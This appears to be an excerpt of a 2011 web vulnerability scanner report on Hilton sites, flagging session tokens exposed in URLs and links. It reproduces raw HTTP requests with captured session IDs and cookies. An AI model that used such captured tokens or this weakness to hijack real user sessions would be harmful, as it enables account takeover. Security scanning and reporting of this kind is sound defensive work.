<li class="brandBarLi brandBarLi_HP" id="brandBarLi_HP"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/hp/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HP');" onmouseout="turnOffPopup('brandBarLi_HP');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_HW" id="brandBarLi_HW"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/hw/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HW');" onmouseout="turnOffPopup('brandBarLi_HW');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_HT" id="brandBarLi_HT"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/ht/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HT');" onmouseout="turnOffPopup('brandBarLi_HT');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_WW" id="brandBarLi_WW"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/hh/home_index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ"></a>
...[SNIP]...
<li>
                                           <a href="http://www1.hilton.com/en_US/hi/sitemap/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Site Map</a>
...[SNIP]...
<li>
                                           <a href="http://www1.hilton.com/en_US/hi/customersupport/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" rel="nofollow">Customer Support</a>
...[SNIP]...
<li>
                                       <a href="http://www1.hilton.com/en_US/ww/customersupport/privacy-policy.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" target="_blank" rel="nofollow" class="linkPrivacyPolicy">Privacy Policy (Updated Sep 2011)</a>
...[SNIP]...
<li>
                                       <a href="http://www1.hilton.com/en_US/hi/customersupport/site-usage.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" rel="nofollow">Site Usage Agreement</a>
...[SNIP]...
<li><a href="http://www1.hilton.com/es/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Espa.ol</a>
...[SNIP]...
<li><a href="http://www1.hilton.com/fr/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Fran.ais</a>
...[SNIP]...
<li><a href="http://www.hilton.co.jp/SiteHomePage;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Japan</a>
...[SNIP]...
9.10. https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.hilton.com
Path:   /en/hi/mytravelplanner/my_account.jhtml

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /en/hi/mytravelplanner/my_account.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_DARGS=/en/crm/login/widget_homepage.jhtml.8 HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
Content-Length: 798
Cache-Control: max-age=0
Origin: http://www.hilton.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hilton.com/en/hi/info/site_usage.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmcore.tst=0.391; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635914358:ss=1317635584777

%2Fcom%2Fhilton%2Fcrm%2Fclient%2Fhandler%2FLoginFormHandler.failureURL=%2Fen%2Fhi%2Flogin%2Flogin.jhtml&_D%3A%2Fcom%2Fhilton%2Fcrm%2Fclient%2Fhandler%2FLoginFormHandler.failureURL=+&%2Fcom%2Fhilton%2F
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Location: /en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21190
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:36 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 49638

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>



...[SNIP]...
9.11. https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.hilton.com
Path:   /en/hi/mytravelplanner/my_account.jhtml

Issue detail

The response contains the following links that appear to contain session tokens:

Request

POST /en/hi/mytravelplanner/my_account.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_DARGS=/en/crm/login/widget_homepage.jhtml.8 HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
Content-Length: 798
Cache-Control: max-age=0
Origin: http://www.hilton.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hilton.com/en/hi/info/site_usage.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmcore.tst=0.391; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635914358:ss=1317635584777

%2Fcom%2Fhilton%2Fcrm%2Fclient%2Fhandler%2FLoginFormHandler.failureURL=%2Fen%2Fhi%2Flogin%2Flogin.jhtml&_D%3A%2Fcom%2Fhilton%2Fcrm%2Fclient%2Fhandler%2FLoginFormHandler.failureURL=+&%2Fcom%2Fhilton%2F
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Location: /en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21190
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:36 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 49638

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>



...[SNIP]...
<td><a href="http://www1.hilton.com/en_US/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Go to home page" tabindex="3" class="OneLinkKeepLinks"><img src="/en/hi/media/images/logos/hdr_logo.gif" alt="Hilton Hotels" border="0">
...[SNIP]...
<br>
                           
                   <a href="https://secure.hilton.com/en/hi/help/sign_in_help.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" rel="nofollow">Forgot password?</a>
...[SNIP]...
<li id="navmain01" title="Specials &amp; Packages"><a href="https://secure.hilton.com/en/hi/promotions/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Specials & Packages</a>
...[SNIP]...
<li id="navmain03" title="Meetings"><a href="https://secure.hilton.com/en/hi/groups/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?eventType=Business">Meetings</a>
...[SNIP]...
<li id="navmain0302" title="Social Gatherings"><a href="https://secure.hilton.com/en/hi/groups/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?eventType=Social&it=Tnav,GM">Social Gatherings</a>
...[SNIP]...
<li id="navmain05" title="Travel Guides"><a href="https://secure.hilton.com/en/hi/ctg/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Travel Guides</a>
...[SNIP]...
<li id="navmain07" title="My Favorite Hotels"><a href="https://secure.hilton.com/en/hi/cart/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">My Favorite Hotels</a>
...[SNIP]...
<li class="off">
                   <a href="https://secure.hilton.com/en/hi/mytravelplanner/my_reservations.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" class="li-category">My Reservations</a>
...[SNIP]...
<li class="off">
                   <a href="https://secure.hilton.com/en/hi/mytravelplanner/my_stays.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" class="li-category">My Hotel Stays</a>
...[SNIP]...
<li class="off">
                   <a href="https://secure.hilton.com/en/hi/mytravelplanner/my_cancellations.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" class="li-category">My Cancellations</a>
...[SNIP]...
<li class="off">
                           <a href="/en/hi/myprofile/my_profile_account_settings.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" class="li-category">My Profile</a>
...[SNIP]...
<li class="off">
                           <a href="/en/hi/mytravelplanner/hhonors_activity_all.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" class="li-category">HHonors Activity</a>
...[SNIP]...
<li class="off">
                           <a href="/en/hi/mytravelplanner/account_services.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" class="li-category">Member Services</a>
...[SNIP]...
<li class="off">
                           <a href="/en/hi/eevents/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" class="li-category" title="Group Booking Tools">e-Events</a>
...[SNIP]...
<li class="off">
                           <a href="/en/hi/mytravelplanner/myway.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" class="li-category">My Way&trade;</a>
...[SNIP]...
<li><a href="/en/hi/myprofile/my_profile_account_settings.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Update Username or Password</a>
...[SNIP]...
<li><a href="/en/hi/myprofile/my_profile_account_settings.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Update Email Address</a>
...[SNIP]...
<li><a href="/en/hi/myprofile/my_profile_email_subscribe.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">View Email Subscriptions</a>
...[SNIP]...
<li><a href="/en/hi/myprofile/my_profile_earning_points.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Edit Preferred Partners</a>
...[SNIP]...
<p>For assistance with a past stay, please email <a href="/en/hi/feedback/guest_assistance.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Guest Assistance</a>
...[SNIP]...
<b>Search and Reservations just got easier!
                   <a href="http://hhonors1.hilton.com/en_US/hh/landing/bookingdemo/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" target="_blank"
                   style="font-weight:bold;">View demo</a>
...[SNIP]...
<li class="brandBarLi brandBarLi_CH" id="brandBarLi_CH"><a class="brandBarLiA" href="http://www1.hilton.com/en/ch/home.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_CH');" onmouseout="turnOffPopup('brandBarLi_CH');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_HI" id="brandBarLi_HI"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HI');" onmouseout="turnOffPopup('brandBarLi_HI');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_DT" id="brandBarLi_DT"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/dt/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_DT');" onmouseout="turnOffPopup('brandBarLi_DT');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_ES" id="brandBarLi_ES"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/es/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_ES');" onmouseout="turnOffPopup('brandBarLi_ES');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_GI" id="brandBarLi_GI"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/gi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_GI');" onmouseout="turnOffPopup('brandBarLi_GI');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_HP" id="brandBarLi_HP"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/hp/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HP');" onmouseout="turnOffPopup('brandBarLi_HP');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_HW" id="brandBarLi_HW"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/hw/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HW');" onmouseout="turnOffPopup('brandBarLi_HW');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_HT" id="brandBarLi_HT"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/ht/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HT');" onmouseout="turnOffPopup('brandBarLi_HT');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_WW" id="brandBarLi_WW"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/hh/home_index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ"></a>
...[SNIP]...
<li>
                                           <a href="http://www1.hilton.com/en_US/hi/sitemap/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Site Map</a>
...[SNIP]...
<li>
                                           <a href="http://www1.hilton.com/en_US/hi/customersupport/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" rel="nofollow">Customer Support</a>
...[SNIP]...
<li>
                                       <a href="http://www1.hilton.com/en_US/ww/customersupport/privacy-policy.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" target="_blank" rel="nofollow" class="linkPrivacyPolicy">Privacy Policy (Updated Sep 2011)</a>
...[SNIP]...
<li>
                                       <a href="http://www1.hilton.com/en_US/hi/customersupport/site-usage.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" rel="nofollow">Site Usage Agreement</a>
...[SNIP]...
<li><a href="http://www1.hilton.com/es/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Espa.ol</a>
...[SNIP]...
<li><a href="http://www1.hilton.com/fr/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Fran.ais</a>
...[SNIP]...
<li><a href="http://www.hilton.co.jp/SiteHomePage;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Japan</a>
...[SNIP]...
9.12. https://secure3.hilton.com/en_US/hi/reservation/book.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure3.hilton.com
Path:   /en_US/hi/reservation/book.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?xch=1041790096,4E9B21AE664381D1B53DE8378483FB39.etc13&inputModule=HOTEL&checkInDay=3&checkInMonthYr=October+2011&checkOutDay=4&checkOutMonthYr=October+2011&flexCheckInDay=3&flexCheckInMonthYr=October+2011&los=1&ctyhocn=BOSLHHH&isReward=false&flexibleSearch=false&source=hotelResWidget&pfsLocale=en HTTP/1.1
Host: secure3.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.825; mmid=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635647394:ss=1317635584777

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Location: https://secure3.hilton.com/en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?execution=e2s1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Date: Mon, 03 Oct 2011 12:53:58 GMT
Connection: keep-alive
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: corporateId=; domain=.hilton.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Length: 521

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://secure3.hilton.com/en_US/hi/reservation/book.htm&#59;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?execution=e2s1">https://secure3.hilton.com/en_US/hi/reservation/book.htm&#59;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?execution=e2s1</a>
...[SNIP]...
9.13. https://secure3.hilton.com/en_US/hi/reservation/book.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure3.hilton.com
Path:   /en_US/hi/reservation/book.htm

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?xch=1041790096,4E9B21AE664381D1B53DE8378483FB39.etc13&inputModule=HOTEL&checkInDay=3&checkInMonthYr=October+2011&checkOutDay=4&checkOutMonthYr=October+2011&flexCheckInDay=3&flexCheckInMonthYr=October+2011&los=1&ctyhocn=BOSLHHH&isReward=false&flexibleSearch=false&source=hotelResWidget&pfsLocale=en HTTP/1.1
Host: secure3.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.825; mmid=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635647394:ss=1317635584777

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Location: https://secure3.hilton.com/en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?execution=e2s1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Date: Mon, 03 Oct 2011 12:53:58 GMT
Connection: keep-alive
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: corporateId=; domain=.hilton.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Length: 521

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://secure3.hilton.com/en_US/h
...[SNIP]...
9.14. http://vdassets.bitgravity.com/embeds/videos/54834a058f00d/2adf12c322cf26d8daa82578343bfb02-ncl_default_hq.json  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://vdassets.bitgravity.com
Path:   /embeds/videos/54834a058f00d/2adf12c322cf26d8daa82578343bfb02-ncl_default_hq.json

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /embeds/videos/54834a058f00d/2adf12c322cf26d8daa82578343bfb02-ncl_default_hq.json?voxtoken=system&width=768&height=457&player_profile=ncl_default_hq&userAgent=Windows_Chrome&flash=10.3%20r183&silverlight=4&version=3.35 HTTP/1.1
Host: vdassets.bitgravity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:47:43 GMT
Server: VoxCAST
Cache-Control: max-age=3600
Content-Type: text/plain
Expires: Mon, 03 Oct 2011 13:47:41 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 03 Oct 2011 02:28:50 GMT
Content-Length: 646
X-Cache: MISS from VoxCAST


document.write("<object type=\"application/x-shockwave-flash\" id=\"embedded_player_54834a058f00d\" name=\"embedded_player_54834a058f00d\" width=\"768\" height=\"457\" data=\"http://vdassets.bitgravi
...[SNIP]...
9.15. http://www.hilton.com/en/hi/brand/about.jhtml  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.hilton.com
Path:   /en/hi/brand/about.jhtml

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en/hi/brand/about.jhtml HTTP/1.1
Host: www.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=UM1GHUXVYDE3SCSGBJBOD4Q; cross-sell=hi; mmcore.tst=0.056; mmid=1706281310%7CFAAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=1706281310%7CFAAAAAodekFwyAYAAA%3D%3D; ClrCSTO=T; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317640644129:ss=1317640644129

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 37539
Date: Mon, 03 Oct 2011 14:17:04 GMT
Connection: close
Vary: Accept-Encoding

<!-- <SETVALUE PARAM="content_head" VALUE="`fileURL("home_head.jhtml")`"> -->

<!-- <SETVALUE PARAM="content_footer" VALUE="`fileURL("home_footer.jhtml")`"> -->


<!DOCTYPE HTML PUBLIC "-//W3C//
...[SNIP]...
<br>
                           
                   <a href="http://www.hilton.com/en/hi/help/sign_in_help.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q" rel="nofollow">Forgot password?</a>
...[SNIP]...
<li id="navmain01" title="Specials &amp; Packages"><a href="http://www.hilton.com/en/hi/promotions/index.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q">Specials & Packages</a>
...[SNIP]...
<li id="navmain03" title="Meetings"><a href="http://www.hilton.com/en/hi/groups/index.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q?eventType=Business">Meetings</a>
...[SNIP]...
<li id="navmain0302" title="Social Gatherings"><a href="http://www.hilton.com/en/hi/groups/index.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q?eventType=Social&it=Tnav,GM">Social Gatherings</a>
...[SNIP]...
<li id="navmain05" title="Travel Guides"><a href="http://www.hilton.com/en/hi/ctg/index.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q">Travel Guides</a>
...[SNIP]...
<li id="navmain07" title="My Favorite Hotels"><a href="http://www.hilton.com/en/hi/cart/index.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q">My Favorite Hotels</a>
...[SNIP]...
<td width="133" valign="top">
       <a href="http://conradhotels.hilton.com/en/ch/brand/about.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q" class="adtnavlinks"><span class="adtnavlinks">
...[SNIP]...
<br>
       <a href="http://doubletree.hilton.com/en/dt/brand/about.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q" class="adtnavlinks"><span class="adtnavlinks">
...[SNIP]...
<br>
       <a href="http://embassysuites.hilton.com/en/es/brand/about.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q" class="adtnavlinks"><span class="adtnavlinks">
...[SNIP]...
<br>
       <a href="http://hamptoninn.hilton.com/en/hp/brand/about.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q" class="adtnavlinks"><span class="adtnavlinks">
...[SNIP]...
<br>
       <a href="http://www.hilton.com/en/hi/brand/about.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q" class="adtnavlinks"><span class="adtnavlinks">
...[SNIP]...
<br>
       <a href="http://home2suites.hilton.com/en/ht/promotions/about_us/index.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q" class="adtnavlinks"><span class="adtnavlinks">
...[SNIP]...
<br>
       <a href="http://homewoodsuites.hilton.com/en/hw/brand/about.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q" class="adtnavlinks"><span class="adtnavlinks">
...[SNIP]...
9.16. http://www.hilton.com/en/hi/info/site_usage.jhtml  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.hilton.com
Path:   /en/hi/info/site_usage.jhtml

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en/hi/info/site_usage.jhtml HTTP/1.1
Host: www.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/customersupport/site-usage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
